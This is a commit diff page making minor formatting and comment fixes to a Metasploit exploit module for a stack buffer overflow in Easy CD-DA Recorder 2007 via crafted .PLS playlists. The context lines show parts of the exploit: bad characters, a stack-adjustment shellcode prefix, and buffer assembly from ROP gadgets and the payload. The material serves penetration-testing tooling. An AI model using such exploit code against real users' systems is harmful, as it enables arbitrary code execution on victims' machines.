Minor code formatting
parent
7fc3511ba9
commit
3f09456ce8
|
@ -14,11 +14,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow vulnerability in
|
||||
This module exploits a stack-based buffer overflow vulnerability in
|
||||
Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.
|
||||
By persuading the victim to open a specially-crafted .PLS file, a
|
||||
remote attacker could execute arbitrary code on the system or cause
|
||||
the application to crash. This modules has been tested successfully on
|
||||
the application to crash. This module has been tested successfully on
|
||||
Windows XP SP3 and Windows 7 SP1.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DisableNops' => true,
|
||||
'BadChars' => "\x0a\x3d",
|
||||
'Space' => 2454,
|
||||
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # ADD ESP,-3500
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
|
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sploit << rop_nops(8)
|
||||
sploit << rop_gadgets
|
||||
sploit << payload.encoded
|
||||
sploit << rand_text_alpha_upper(10000) # make it crash
|
||||
sploit << rand_text_alpha_upper(10000) # Generate exception
|
||||
|
||||
# Create the file
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
|
|
Loading…
Reference in New Issue